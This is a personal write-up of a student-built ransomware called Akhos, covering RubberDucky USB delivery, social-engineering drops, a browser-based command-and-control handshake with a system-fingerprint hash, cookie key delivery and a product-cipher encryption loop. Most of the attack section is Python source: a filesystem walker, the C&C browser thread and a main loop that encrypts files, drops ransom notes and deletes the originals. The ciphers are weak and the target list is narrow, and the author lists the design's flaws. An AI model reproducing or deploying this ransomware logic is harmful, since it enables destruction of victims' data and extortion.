Akhos Ransomware

Ahkos is the name given to a toy ransomware that I built for a Cyber Security module during my undergraduate degree. The word comes from ancient Greece, ἄχος, and means to be upset or afraid, which is what most people feel when they are dealing with these sorts of malware.

Akhos is comprised of three parts; Python, compiled into an executable to find and encrypt the files, Ruby running Sinatra backed by PostgreSQL to provides the web-based Command and Control, and a RubberDucky that provides the delivery mechanism.

STAGE 1: DELIVERY

A RubberDucky will be used to deliver the payload to the target organisation. For those unaware, a RubberDucky is a small device that looks like a USB flash drive but acts like a USB keyboard. It exploits the trust relationship that modern systems have with peripheral devices that are plugged in via USB. Using a special language called DuckyScript, the developer can send a sequence of keyboard strokes to the computer when the device is plugged in, allowing them to execute arbitrary commands. How this USB gets into the hands of an employee at the target company can be achieved in many ways; dead drops, mail, free hand-outs at conferences, plugged in during office tours, etc.

The reason behind this choice is due to a conference talk that was presented at UKFast, Manchester, in 2014. At that conference, there was a talk about social engineering from a well renowned security professional: Andy Hague. During this talk he outlined an experiment that he performed in which he sent out USB Flash Drives packaged in a golden box to the Chief Financial Officer (CFO) at 500 different companies. He sent these out on Friday evening so they would be waiting on the desk of the CFO the following Monday morning as they arrived at work. Inside the golden box was a elegantly written note inviting the CFO to a company event and informing them to respond via the USB provided. Upon inserting this USB into their computer, a full screen picture would appear with a message informing them of the experiment. Behind the scenes that USB pinged his server to show him how many of the devices were plugged in. By noon that Monday he had over 350 out of the 500 USBs ping his server; 70% success rate within 3 hours of the working week beginning.

STAGE 2: DEPLOYMENT

When the RubberDucky is plugged in, the embedded firmware will automatically run a script located on the inserted microSD card, and that script is configured by the attacker to run whatever commands they need to fulfil their objectives. In this case, a binary called RSVP.exe is executed. Let's have a look at what happens when it is run:

After initial setup of logging and configuration variables, two threads are spawned to run concurrently. The first of these is the DirectoryThread. The sole purpose of this thread is to walk the filesystem and gather a list of files to encrypt.


      from threading import Thread
      import os
      from queue import Queue
      from pathlib import Path
      from re import match


      class DirectoryThread(Thread):
          '''
            This thread is responsibile for locating and building a list of files that are going to
            be encrypted. It recursively traverses the folders and returns a list via the queue.
          '''

          def __init__(self, queue: Queue, admin: bool = False):
              Thread.__init__(self)
              self.queue = queue
              # The whitelist has been hardcoded for simplicity, but in reality the patterns are
              # stored in a YAML file and loaded during startup.
              self.whitelist = ['.*.akhos_target']
              self.admin = admin

          def run(self):
              files = self.collect_filelist()
              self.queue.put(files)

          #abstractmethod
          def collect_filelist(self):
              raise NotImplementedError

          @staticmethod
          def directory_thread_from_os(os: str, queue: Queue, admin: bool = False):
              if os == 'linux':
                  return LinuxDirectoryThread(queue, admin)
              if os == 'windows':
                  return WindowsDirectoryThread(queue, admin)


      class LinuxDirectoryThread(DirectoryThread):
          #override
          def collect_filelist(self):
              directory_array = []
              root = '/' if self.admin else '/home/'
              for dirname, dirnames, filenames in os.walk(root):
                  for filename in filenames:
                      for pattern in self.whitelist:
                          if match(pattern, Path(filename).suffix):
                              directory_array.append(Path(dirname, filename))
              return directory_array


      class WindowsDirectoryThread(DirectoryThread):
          #override
          def collect_filelist(self):
              directory_array = []
              root = 'C:/' if self.admin else 'C:/Users/'
              for dirname, dirnames, filenames in os.walk(root):
                  for filename in filenames:
                      for pattern in self.whitelist:
                          if match(pattern, Path(filename).suffix):
                              directory_array.append(Path(dirname, filename))
              return directory_array

At the same time, there is a another thread spawned called BrowserThread. The purposes of this thread is to determine the name of the browser that is installed and open a page to the Command and Control URL (for example): https://command_and_control.akhos.server. It gathers some information to create a MD5 hash that can be used to uniquely identify the system, then appends the hash to the URL as the target path:
https://command_and_control.akhos.server/1a79a4d60de6718e8e5b326e338ae533


      import webbrowser
      from threading import Thread
      from hashlib import md5
      from getpass import getuser
      from platform import platform
      from socket import gethostname
      from time import time_ns
      from queue import Queue


      class BrowserThread(Thread):
          '''
          This thread is responsible for determining the initial connection to the C&C server. It first
          creates an MD5 hexdigest of some system information to pass on. Second it needs to open a
          webpage and pass on which application opened it.
          '''

          def __init__(self, queue: Queue, cc_url: str):
              Thread.__init__(self)
              self.queue = queue
              self.cc_url = cc_url

          def run(self) -> bool:
              uid = self.generate_uid()
              browser = self.find_usable_browser()
              if not browser:
                  return False

              browser.open_new_tab(f'{self.cc_url}/{uid}')
              browser_name = self.normalise_browser_name(self.get_browser_name(browser))
              if not browser_name:
                  return False

              self.queue.put(browser_name)
              return True

          def generate_uid(self) -> str:
              info = platform() + gethostname() + getuser() + str(time_ns())
              return md5(info.encode('utf-8')).hexdigest()

          def find_usable_browser(self):
              for browser in self.browser_list():
                  try:
                      return webbrowser.get(browser)
                  except webbrowser.Error:
                      continue
              return None

          #abstractmethod
          def browser_list(self) -> list:
              raise NotImplementedError

          #abstractmethod
          def get_browser_name(self, browser) -> str:
              raise NotImplementedError

          def normalise_browser_name(self, browser_name: str) -> str:
              if browser_name in ['google-chrome', 'chrome', 'chromium', 'chromium-browser']:
                  return 'chrome'
              elif browser_name in ['mozilla', 'firefox']:
                  return 'firefox'
              else:
                  return None

          @staticmethod
          def browser_thread_from_os(os, queue, cc_url):
              if os == 'linux':
                  return LinuxBrowserThread(queue, cc_url)
              if os == 'windows':
                  return WindowsBrowserThread(queue, cc_url)


      class LinuxBrowserThread(BrowserThread):
          def __init__(self, queue, cc_url):
              super().__init__(queue, cc_url)

          #override
          def browser_list(self) -> list:
              return ['firefox', 'google-chrome', 'chromium']

          #override
          def get_browser_name(self, browser):
              return browser.basename


      class WindowsBrowserThread(BrowserThread):
          '''
          Windows specific searching, The 'webbrowser' module has a browser type of 'windows-default',
          which is likely to be chosen. It doesn't support the `basename` method, so the registry needs to
          be queried to find out which browser is set to default if this option is chosen.
          '''

          def __init__(self, queue, cc_url):
              super().__init__(queue, cc_url)

          #override
          def browser_list(self) -> list:
              return ['firefox', 'mozilla', 'google-chrome', 'chrome', 'windows-default']

          #override
          def get_browser_name(self, browser) -> str:
              if type(browser) == webbrowser.WindowsDefault:
                  from winreg import OpenKey, QueryValueEx, HKEY_CURRENT_USER
                  from re import search

                  def get_browser_name_from_registry_key(reg_path: str) -> str:
                      with OpenKey(HKEY_CURRENT_USER, reg_path) as key:
                          default = QueryValueEx(key, 'ProgId')[0].lower()
                          for element in self.browser_list():
                              if search(element, default):
                                  return element
                      return None

                  path = r'Software\Microsoft\Windows\Shell\Associations\UrlAssociations\https\UserChoice'
                  browser_name = get_browser_name_from_registry_key(path)
                  if browser_name:
                      return browser_name

                  path = r'Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice'
                  browser_name = get_browser_name_from_registry_key(path)
                  return browser_name
              else:
                  return browser.basename

The page displayed to the user when the browser opens will contain a form that resembles the one in the image to the bottom left. This is designed to keep the user distracted while the ransomware encrypts the files, and has a delayed reset trigger on the form once upon clicking "Submit". The other use for this page is to deliver the encryption key to the system, and that is done via a HTTP cookie. An example of this is shown on the bottom right. As you can see, the value is stored in the 'name' field. This is because cookie values are usually encrypted by the browser, but the name is not. The cookie also has a max age so that is it deleted.

Once the browser thread has returned the name of the browser and sent the user to the RSVP form, the next stage is to poll the browser cookie cache for the key. This is done in an object aptly named CookieRetriever.

STAGE 3: INFECTION

With the key retrieved from the cookie, it must be split into the three components. This is because Akhos uses a "product cipher" for encryption. A product cipher is simply a pipeline of algorithms, where the output of one is the input to the next. Modern ciphers, such as the Advanced Encryption Standard (AES) use this approach. The following diagram depicts the flow that Akhos uses:

The three ciphers chosen for this are: Affine, transposition, and the Vigenere. Each has their own restrictions on the format of the key, so three keys are needed. These are all symmetric ciphers and use the same key for decrypting a ciphertext. To encrypt a plain text message P with this product cipher:

P will be substituted with the Affine cipher to generate the cipher text C1 . C1 will be permuted using transposition cipher to generate C2 . C2 will then be substituted using the Vigenere cipher to produce the final cipher text C3 .
C = E3(E2(E1(P, Ka, Kb), K2), K3)

At this point in the execution, the directory thread should have returned with the list of files to encrypt. Now the main loop can run, passing each file into the product cipher and writing the output to a new file.


      # Prior to this is the collection of the encryption key.

      # Ensure directory list is finished, then retrieve list from the queue.
      directory_thread.join()
      file_list = queue.get()

      # A new file will be created every 10th file.
      counter = 0
      for file_path in file_list:
          # Open file and encrypt contents.
          original_file_path = Path(file_path)
          ciphertext = encryptor.encrypt(keys, original_file_path.read_text())

          # Hash file name and append file extension.
          hashed_file_name = md5(original_file_path.name.encode('utf-8')).hexdigest() + '.0wn3d'

          # Write encrypted text to file.
          out_file_path = Path(original_file_path.parent, hashed_file_name)
          out_file_path.write_text(ciphertext)

          # Every 10 files create new random file.
          counter += 1
          if counter % 10 == 0:
              random_file_path = Path(f'{md5(str(counter).encode("utf-8")).hexdigest()}.0wn3d')
              random_file_path.write_bytes(urandom(4096))

          # Add payment instruction file to each directory.
          ransom_file_path = Path(original_file_path.parent, 'ransom.txt')
          if not ransom_file_path.exists():
              ransom_file_path.write_text(ransome_text)

          # Delete old file.
          remove(original_file_path)

A new file is for every 10 files encrypted. This adds a level of obfuscation to the binary to make reverse engineering efforts a little more challenging. A standard ransom note is added to each directory with a link to an onion site, payment instructions, and the warning regarding missing payment.

Altogether, this makes a complete ransomware variant, although it has several obvious weaknesses. First and foremost is the use of weak and broken ciphers. In a real-world scenario, there would be no need to use anything other that AES or an equally powerful alternative, but this project was a lesson in cryptography as well as ransomware. The second, and equally obvious, flaw is that the Volume Shadow Service (VSS) was not deleted. VSS is a Windows backup tool that could be used to restore the encrypted files.